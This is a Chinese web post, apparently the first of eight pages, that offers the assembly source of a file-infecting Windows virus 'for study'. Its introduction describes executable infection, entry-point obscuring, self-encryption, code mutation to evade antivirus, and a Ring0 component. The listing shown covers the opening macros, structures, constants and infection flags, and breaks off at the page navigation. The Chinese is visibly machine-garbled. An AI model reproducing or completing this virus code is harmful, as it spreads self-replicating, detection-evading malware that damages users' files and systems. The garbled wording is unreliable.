供应学习利用的纯ASM编写病毒[网络技术]

纯ASM编写的病毒供学习利用
这是一只纯ASM编写的病毒,具有文件传染,进口代码变形,自身加密,EPO等功效,是一只无任何
特点码的病毒,计划目的是为抵挡反病毒软件的特点码杀毒、行为杀毒和虚拟机杀毒,现有代码
未供应任何破坏功效,但会主动传染可履行文件,并且被传染过的文件很难再复原,这点请注意

别的这东西也供应了Ring0功效,主要用于传染运行中的可履行文件

这东西写完后放了好久,不太记得怎么用了,把代码放上来有爱好的朋友拿去研究研究,汇编工
具为TASM,由于已经不肯定会产生什么后果了,测试时请自行承当风险,还有不要拿去做坏事.

部份代码:

.486p
.model flat, stdcall
option casemap :none
;----------------------------------------------------------------------------
CRC16 MACRO string, lstr
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, lstr
  CRC_VALUE = CRC_VALUE xor '&CRC_BYTE'
  REPT 8
  CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
  ENDM
ENDM
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dw (CRC_VALUE and 0ffffh)
ENDM

APIDEF MACRO string, sym
CRC16, sym
sym = vEnd + VARLEN + APICOUNT
APICOUNT = APICOUNT + 6
ENDM

VARDEF MACRO string, sym, vw
sym = VARCOUNT
VARCOUNT = VARCOUNT + vw
ENDM

LIBDEF MACRO string, sym, lstr
local l1, l2
l1:
db lstr, 0
l2:
sym = LIBCOUNT
LIBCOUNT = LIBCOUNT + (l2 - l1)
ENDM

pushsz MACRO lstr
local pushstr
call pushstr
db  lstr, 0
pushstr:
ENDM

rdtsc MACRO
db 0fh, 31h
ENDM

ShowMessage MACRO lstr
IF DEBUG
OUTPUTMESSAGE = 1
pushsz, lstr
call OutputMessage
ENDIF
ENDM

WIN32_FIND_DATAA STRUCT
dwFileAttributes   DWORD ?
ftCreationTime    QWORD ?
ftLastAccessTime   QWORD ?
ftLastWriteTime    QWORD ?
nFileSizeHigh    DWORD ?
nFileSizeLow    DWORD ?
dwReserved0     DWORD ?
dwReserved1     DWORD ?
cFileName     BYTE 260 dup(?)
cAlternateFileName   BYTE 14 dup(?)
ALIGN 4
WIN32_FIND_DATAA ENDS
PROCESSENTRY32 STRUCT
dwSize      DWORD ?
cntUsage     DWORD ?
th32ProcessID    DWORD ?
th32DefaultHeapID   DWORD ?
th32ModuleID    DWORD ?
cntThreads     DWORD ?
th32ParentProcessID   DWORD ?
pcPriClassBase    DWORD ?
dwFlags      DWORD ?
szExeFile     BYTE 260 dup(?)
PROCESSENTRY32 ENDS
;--------------------------------------------------------
DEBUG = 1
OUTPUTMESSAGE = 0
VARLEN = 140h
vSize = vEnd - vBegin
vdelta = vEnd + 80h
MAX_PATH = 104h
VARCOUNT = 0
APICOUNT = 0
LIBCOUNT = 0
MainLoaderSize equ 26
MiniLoaderSize equ 10
FILE_WRITE_ENABLE equ 00000001b
RING0_CODE_ALLOW equ 00000010b
USED_MINI_LOADER equ 00000100b
NTK_API_INIT equ 8
NTL_API_INIT equ 9
;****************************************************************************
;  全局变量构造
;****************************************************************************
VARCOUNT = -80h
VARDEF, var_k32base, 4
VARDEF, var_vbase, 4
VARDEF, var_temp1, 4
VARDEF, var_temp2, 4
VARDEF, var_temp3, 4
VARDEF, var_temp4, 4
VARDEF, var_flags, 4
VARDEF, var_fname, 4
VARDEF, var_ftime, 8
VARDEF, var_fsize, 8
VARDEF, var_fpatch, 4
VARDEF, var_hFile, 4
VARDEF, var_hMap, 4
VARDEF, var_pMem, 4
VARDEF, var_kfmap, 4
VARDEF, var_hostcall, 4
VARDEF, fun_random, 4
VARDEF, fun_knlxx, 4
VARDEF, var_voff, 4
VARDEF, var_vkey, 4
;--------------------------------------------------------
VARCOUNT = 0
VARDEF, fun_WNetCloseEnum, 4
VARDEF, fun_WNetEnumResourceA, 4
VARDEF, fun_WNetOpenEnumA, 4
.DATA
;****************************************************************************
;  初始化
;****************************************************************************
vBegin:
push eax
add  esp, 4

[1] [2] [3] [4] [5] [6] [7] [8]  下一页